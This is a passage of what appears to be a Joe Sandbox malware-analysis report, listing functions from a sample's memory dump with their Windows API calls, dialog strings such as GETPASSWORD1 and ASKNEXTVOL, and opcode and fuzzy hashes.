                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ItemText$DialogWindow
                                                                                                                    • String ID: ASKNEXTVOL
                                                                                                                    • API String ID: 445417207-3402441367
                                                                                                                    • Opcode ID: d4413e94f1745c820b7e1e77ff9700a098c7ab7e4aa1d90bac550157c0e4f58a
                                                                                                                    • Instruction ID: e72b9677cb200d8b20336bf433600d767c84bf4f4051116945aa65ef0ac9d3c1
                                                                                                                    • Opcode Fuzzy Hash: d4413e94f1745c820b7e1e77ff9700a098c7ab7e4aa1d90bac550157c0e4f58a
                                                                                                                    • Instruction Fuzzy Hash: 37118432240200AFDA119F6C9C89F6A77E9EF4A742F1048B0F241DF5B1CB61994597A6
                                                                                                                    Function 00B8D8EC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 67COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • __fprintf_l.LIBCMT ref: 00B8D954
                                                                                                                    • _strncpy.LIBCMT ref: 00B8D99A
                                                                                                                      • Part of subcall function 00B91DA7: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000200,00000000,00000000,?,00BC1030,00000200,00B8D928,00000000,?,00000050,00BC1030), ref: 00B91DC4
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ByteCharMultiWide__fprintf_l_strncpy
                                                                                                                    • String ID: $%s$@%s
                                                                                                                    • API String ID: 562999700-834177443
                                                                                                                    • Opcode ID: faf1ca4ab85dfeeb8e89193046a91ba829fbd656e26374f6cd9c50049246bc2e
                                                                                                                    • Instruction ID: 5d490370b26e0cf8218db24000813ce63f039b27754f3a59d02fca0f05bcced2
                                                                                                                    • Opcode Fuzzy Hash: faf1ca4ab85dfeeb8e89193046a91ba829fbd656e26374f6cd9c50049246bc2e
                                                                                                                    • Instruction Fuzzy Hash: 3D215C72440248AADF21EEA8CC46FEE7BE8EF05704F1405A2F910961F2E272DA48DB51
                                                                                                                    Function 00B90E46 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 63COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • InitializeCriticalSection.KERNEL32(00000320,00000000,?,?,?,00B8AC5A,00000008,?,00000000,?,00B8D22D,?,00000000), ref: 00B90E85
                                                                                                                    • CreateSemaphoreW.KERNEL32(00000000,00000000,00000040,00000000,?,?,?,00B8AC5A,00000008,?,00000000,?,00B8D22D,?,00000000), ref: 00B90E8F
                                                                                                                    • CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,00B8AC5A,00000008,?,00000000,?,00B8D22D,?,00000000), ref: 00B90E9F
                                                                                                                    Strings
                                                                                                                    • Thread pool initialization failed., xrefs: 00B90EB7
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Create$CriticalEventInitializeSectionSemaphore
                                                                                                                    • String ID: Thread pool initialization failed.
                                                                                                                    • API String ID: 3340455307-2182114853
                                                                                                                    • Opcode ID: 66a070c20be8a0de362cb70e6fe3d012c98c18f4d019ea5954d3608d1086e84d
                                                                                                                    • Instruction ID: df19b9e983495758ff84ab1987b18b8abf513270e90314d77075a8462381d2f6
                                                                                                                    • Opcode Fuzzy Hash: 66a070c20be8a0de362cb70e6fe3d012c98c18f4d019ea5954d3608d1086e84d
                                                                                                                    • Instruction Fuzzy Hash: DF1191B1A04B089FC3216F7ADC84AA7FBECEB55744F544C6EF1DAC3200DAB159408B64
                                                                                                                    Function 00B9B270 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00B81316: GetDlgItem.USER32(00000000,00003021), ref: 00B8135A
                                                                                                                      • Part of subcall function 00B81316: SetWindowTextW.USER32(00000000,00BB35F4), ref: 00B81370
                                                                                                                    • EndDialog.USER32(?,00000001), ref: 00B9B2BE
                                                                                                                    • GetDlgItemTextW.USER32(?,00000066,?,00000080), ref: 00B9B2D6
                                                                                                                    • SetDlgItemTextW.USER32(?,00000067,?), ref: 00B9B304
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ItemText$DialogWindow
                                                                                                                    • String ID: GETPASSWORD1
                                                                                                                    • API String ID: 445417207-3292211884
                                                                                                                    • Opcode ID: 747000e0e9b59e489ad627205ae055160a5d7c06328154b50e89a3d3f8fc989d
                                                                                                                    • Instruction ID: 73b7d2b86c74edecd2cf97a9821de44ff9a3495cff3f6ebf612eb307f07fc409
                                                                                                                    • Opcode Fuzzy Hash: 747000e0e9b59e489ad627205ae055160a5d7c06328154b50e89a3d3f8fc989d
                                                                                                                    • Instruction Fuzzy Hash: 8B11E53290012976DF22AB74AE89FFE3BECEB1A700F0000B5FA45B7190C7A49A018761
                                                                                                                    Function 00B9DCDD Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 46COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: RENAMEDLG$REPLACEFILEDLG
                                                                                                                    • API String ID: 0-56093855
                                                                                                                    • Opcode ID: 4bfbbda9aeb3986e5b2a6641756f707ba6277308d20395b28376a3d8e331d83f
                                                                                                                    • Instruction ID: b230908627cd4f30090f240246890aa10a24960e178b30cd287ca3ef86ecaa1f
                                                                                                                    • Opcode Fuzzy Hash: 4bfbbda9aeb3986e5b2a6641756f707ba6277308d20395b28376a3d8e331d83f
                                                                                                                    • Instruction Fuzzy Hash: 78017176604245AFDF159F5AFC84EA67BE8FB0D394B040476F905D7231DE319850DBA0
                                                                                                                    Function 00BA9A1E Relevance: 6.3, APIs: 4, Instructions: 305COMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: __alldvrm$_strrchr
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1036877536-0
                                                                                                                    • Opcode ID: bd80df88fd36397a74f1d09f46f498bd400f42511a2e95d334d89abd8e93371a
                                                                                                                    • Instruction ID: ddaeb9da94a74aa7169a5d85d49171851eb498c8f64ac2287f3cf0a08ebfb495
                                                                                                                    • Opcode Fuzzy Hash: bd80df88fd36397a74f1d09f46f498bd400f42511a2e95d334d89abd8e93371a
                                                                                                                    • Instruction Fuzzy Hash: EEA17C729087869FEB25CF28C8917BEBBE5EF57320F2441EEE4959B281D2388D41D750
                                                                                                                    Function 00B8A354 Relevance: 6.1, APIs: 4, Instructions: 127filetimeCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,?,00000800,?,00B87F69,?,?,?), ref: 00B8A3FA
                                                                                                                    • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,00000800,?,?,00000800,?,00B87F69,?), ref: 00B8A43E
                                                                                                                    • SetFileTime.KERNEL32(?,00000800,?,00000000,?,?,00000800,?,00B87F69,?,?,?,?,?,?,?), ref: 00B8A4BF
                                                                                                                    • CloseHandle.KERNEL32(?,?,?,00000800,?,00B87F69,?,?,?,?,?,?,?,?,?,?), ref: 00B8A4C6
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: File$Create$CloseHandleTime
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2287278272-0
                                                                                                                    • Opcode ID: eed7b195d04e6ac9519c41fcb3552d615203c7c5c812e60dfd3257359368d41f
                                                                                                                    • Instruction ID: 61c9e9e996e65cea74d58d074951beeb73a042d74f35b2ef0bf7f2bf5377a7ac
                                                                                                                    • Opcode Fuzzy Hash: eed7b195d04e6ac9519c41fcb3552d615203c7c5c812e60dfd3257359368d41f
                                                                                                                    • Instruction Fuzzy Hash: 0D419231188381ABEB31EF24DC45F9EBBE49F85700F08099EB5D1932A1D6A49A48DB53
                                                                                                                    Function 00B81100 Relevance: 6.1, APIs: 4, Instructions: 119COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _wcslen
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 176396367-0
                                                                                                                    • Opcode ID: 73babdcbe430b6dda6401778cf54c1ce2191ca42cc39bf6e12b8cda9c0f380e0
                                                                                                                    • Instruction ID: 0f226ed53f02d01b70bb67120a73b702480d9beee34f81afde9ed45a5134c303
                                                                                                                    • Opcode Fuzzy Hash: 73babdcbe430b6dda6401778cf54c1ce2191ca42cc39bf6e12b8cda9c0f380e0
                                                                                                                    • Instruction Fuzzy Hash: 7941B4719016699BCB21AF688C49AEE7BFCEF01711F00046AFD45F7251DF30AE558BA4
                                                                                                                    Function 00BAC988 Relevance: 6.1, APIs: 4, Instructions: 110COMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00BA91E0,?,00000000,?,00000001,?,?,00000001,00BA91E0,?), ref: 00BAC9D5
                                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00BACA5E
                                                                                                                    • GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00BA6CBE,?), ref: 00BACA70
                                                                                                                    • __freea.LIBCMT ref: 00BACA79
                                                                                                                      • Part of subcall function 00BA8E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00BACA2C,00000000,?,00BA6CBE,?,00000008,?,00BA91E0,?,?,?), ref: 00BA8E38
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2652629310-0
                                                                                                                    • Opcode ID: 37f84e592b707ef617a448098be9784616c6c4b1d41d1722770686c11f7d3a49
                                                                                                                    • Instruction ID: 848443e0c517c2a0face329291f697c5809c2121f8328017e748c2fa16f2bb5b
                                                                                                                    • Opcode Fuzzy Hash: 37f84e592b707ef617a448098be9784616c6c4b1d41d1722770686c11f7d3a49
                                                                                                                    • Instruction Fuzzy Hash: 1F318E72A0021AABDF25DF64DC85DBE7BE5EB42710B1442A8FC14E7254EB35DD50CBA0
                                                                                                                    Function 00B9A663 Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetDC.USER32(00000000), ref: 00B9A666
                                                                                                                    • GetDeviceCaps.GDI32(00000000,00000058), ref: 00B9A675
                                                                                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00B9A683
                                                                                                                    • ReleaseDC.USER32(00000000,00000000), ref: 00B9A691
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CapsDevice$Release
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1035833867-0
                                                                                                                    • Opcode ID: 1df1f539e3d9d9e46067f96a0cdb35c81ce0faa6842e737c46247bf727813325
                                                                                                                    • Instruction ID: d08e10e632af87dd8d00a65859a3a8fef0d93800276f43518da8d14b54604da6
                                                                                                                    • Opcode Fuzzy Hash: 1df1f539e3d9d9e46067f96a0cdb35c81ce0faa6842e737c46247bf727813325
                                                                                                                    • Instruction Fuzzy Hash: 42E0EC31942B61A7D6A15B60AC8DF8B3E94AB09F52F010111FA059B291DF6586008BA1
                                                                                                                    Function 00B9A80C Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 237COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00B9A699: GetDC.USER32(00000000), ref: 00B9A69D
                                                                                                                      • Part of subcall function 00B9A699: GetDeviceCaps.GDI32(00000000,0000000C), ref: 00B9A6A8
                                                                                                                      • Part of subcall function 00B9A699: ReleaseDC.USER32(00000000,00000000), ref: 00B9A6B3
                                                                                                                    • GetObjectW.GDI32(?,00000018,?), ref: 00B9A83C
                                                                                                                      • Part of subcall function 00B9AAC9: GetDC.USER32(00000000), ref: 00B9AAD2
                                                                                                                      • Part of subcall function 00B9AAC9: GetObjectW.GDI32(?,00000018,?), ref: 00B9AB01
                                                                                                                      • Part of subcall function 00B9AAC9: ReleaseDC.USER32(00000000,?), ref: 00B9AB99
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ObjectRelease$CapsDevice
                                                                                                                    • String ID: (
                                                                                                                    • API String ID: 1061551593-3887548279
                                                                                                                    • Opcode ID: 40ed581310967be8a65050437223cc77326a85ac9277562ecf6cb6546d119ce4
                                                                                                                    • Instruction ID: 8f491696a67562cd86a4c00a44b9a5b3903a8b41c097f79fd87731dc4fa8e2a6
                                                                                                                    • Opcode Fuzzy Hash: 40ed581310967be8a65050437223cc77326a85ac9277562ecf6cb6546d119ce4
                                                                                                                    • Instruction Fuzzy Hash: 2491E371604350AFDA11DF25D884A2BBBE8FFC9700F00495EF596D7260DB70A905CFA2
                                                                                                                    Function 00BAB1B8 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 168COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • _free.LIBCMT ref: 00BAB324
                                                                                                                      • Part of subcall function 00BA9097: IsProcessorFeaturePresent.KERNEL32(00000017,00BA9086,00000050,00BB3A34,?,00B8D710,00000004,00BC1030,?,?,00BA9093,00000000,00000000,00000000,00000000,00000000), ref: 00BA9099
                                                                                                                      • Part of subcall function 00BA9097: GetCurrentProcess.KERNEL32(C0000417,00BB3A34,00000050,00BC1030), ref: 00BA90BB
                                                                                                                      • Part of subcall function 00BA9097: TerminateProcess.KERNEL32(00000000), ref: 00BA90C2
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Process$CurrentFeaturePresentProcessorTerminate_free
                                                                                                                    • String ID: *?$.
                                                                                                                    • API String ID: 2667617558-3972193922
                                                                                                                    • Opcode ID: 24177f1303fc0c2b907af2c7b7eb43e02322faf7c38b9a999d5b9cde15d1856f
                                                                                                                    • Instruction ID: 5f9f8b4c80a4f093a8de1171b5253148d32d30a1f6a1e72a4d08101ad795330d
                                                                                                                    • Opcode Fuzzy Hash: 24177f1303fc0c2b907af2c7b7eb43e02322faf7c38b9a999d5b9cde15d1856f
                                                                                                                    • Instruction Fuzzy Hash: 86517471E0420AEFDF14DFA8C881AADBBF5EF59314F2441AAE864E7341E7359E018B50
                                                                                                                    Function 00B875DE Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 137timeCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • __EH_prolog.LIBCMT ref: 00B875E3
                                                                                                                      • Part of subcall function 00B905DA: _wcslen.LIBCMT ref: 00B905E0
                                                                                                                      • Part of subcall function 00B8A56D: FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 00B8A598
                                                                                                                    • SetFileTime.KERNEL32(?,?,?,?,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00B8777F
                                                                                                                      • Part of subcall function 00B8A4ED: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,00B8A325,?,?,?,00B8A175,?,00000001,00000000,?,?), ref: 00B8A501
                                                                                                                      • Part of subcall function 00B8A4ED: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00B8A325,?,?,?,00B8A175,?,00000001,00000000,?,?), ref: 00B8A532
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: File$Attributes$CloseFindH_prologTime_wcslen
                                                                                                                    • String ID: :
                                                                                                                    • API String ID: 3226429890-336475711
                                                                                                                    • Opcode ID: 01f8af896c729ab8d9cac939c24e8eafef1e403cd85e6d393f234c89374d92a7
                                                                                                                    • Instruction ID: 9c984c61be1001f9719bbb4658609bc7c3a8e3d1dccb90b5669ae569e5af9e8d
                                                                                                                    • Opcode Fuzzy Hash: 01f8af896c729ab8d9cac939c24e8eafef1e403cd85e6d393f234c89374d92a7
                                                                                                                    • Instruction Fuzzy Hash: 74415071805258AAEF25FB64CC95EEEB3FCEF55304F1440E6B605A20A2DB749F84CB61
                                                                                                                    Function 00B9B48E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 77COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
